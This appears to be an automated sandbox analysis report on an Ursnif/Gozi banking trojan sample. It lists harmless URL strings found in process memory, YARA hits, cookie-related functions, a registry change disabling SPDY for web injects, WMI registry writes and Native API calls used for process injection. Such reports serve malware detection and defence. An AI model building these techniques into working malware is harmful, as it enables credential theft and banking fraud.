            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
            Source: msapplication.xml1.3.drString found in binary or memory: http://www.google.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
            Source: msapplication.xml2.3.drString found in binary or memory: http://www.live.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
            Source: msapplication.xml3.3.drString found in binary or memory: http://www.nytimes.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
            Source: msapplication.xml4.3.drString found in binary or memory: http://www.reddit.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
            Source: msapplication.xml5.3.drString found in binary or memory: http://www.twitter.com/
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
            Source: msapplication.xml6.3.drString found in binary or memory: http://www.wikipedia.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
            Source: msapplication.xml7.3.drString found in binary or memory: http://www.youtube.com/
            Source: explorer.exe, 00000021.00000000.417253230.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
            Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
            Source: powershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000001A.00000002.427712389.000002A5848DE000.00000004.00000001.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 0000001A.00000002.652653486.000002A594731000.00000004.00000001.sdmpString found in binary or memory: https://nuget.org/nuget.exe

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.416323968.0000011AB4010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.409185391.0000000000560000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242277638.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242347487.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.350560370.0000000002F8B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242303966.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242243405.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242219094.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5556, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 4672, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6780, type: MEMORY

            E-Banking Fraud:

            barindex
            Detected Gozi e-Banking trojanShow sources
            Source: C:\Windows\System32\loaddll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff0_2_004531EC
            Source: C:\Windows\System32\loaddll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ie0_2_004531EC
            Source: C:\Windows\System32\loaddll32.exeCode function: lstrlenW,RtlAllocateHeap,memcpy,lstrcpyW,HeapFree,RtlAllocateHeap,RtlAllocateHeap,HeapFree,lstrlenW,RtlAllocateHeap,HeapFree,HeapFree,CreateDirectoryW,lstrlenW,DeleteFileW,HeapFree,HeapFree, \cookie.ff0_2_004531EC
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.416323968.0000011AB4010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.409185391.0000000000560000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242277638.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242347487.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.350560370.0000000002F8B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242303966.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242243405.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242219094.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5556, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 4672, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6780, type: MEMORY
            Disables SPDY (HTTP compression, likely to perform web injects)Show sources
            Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

            System Summary:

            barindex
            Writes or reads registry keys via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Writes registry values via WMIShow sources
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
            Source: C:\Windows\System32\loaddll32.exeMemory allocated: 73750000 page execute and read and writeJump to behavior
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_73751CEF GetProcAddress,NtCreateSection,memset,0_2_73751CEF
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_737515AB GetLastError,NtClose,0_2_737515AB
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_73751880 NtMapViewOfSection,0_2_73751880
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_737524C5 NtQueryVirtualMemory,0_2_737524C5
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0044B868 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,0_2_0044B868
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00461813 NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,0_2_00461813
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00446825 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,0_2_00446825
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00453A77 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,0_2_00453A77
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0045620F GetProcAddress,NtCreateSection,memset,0_2_0045620F
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0045A3DE NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,0_2_0045A3DE
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0046345F NtMapViewOfSection,0_2_0046345F
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00462557 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,0_2_00462557
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00441D18 HeapFree,memcpy,memcpy,memcpy,NtUnmapViewOfSection,NtClose,memset,0_2_00441D18
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0044C536 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,0_2_0044C536
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0045865A NtQueryInformationProcess,0_2_0045865A
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0044976D GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,0_2_0044976D
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00450084 memset,NtQueryInformationProcess,0_2_00450084
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00465A8E NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,0_2_00465A8E
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0045AAB7 NtGetContextThread,RtlNtStatusToDosError,0_2_0045AAB7
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00444C96 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,0_2_00444C96
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00457511 memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,0_2_00457511
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00442D26 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,0_2_00442D26
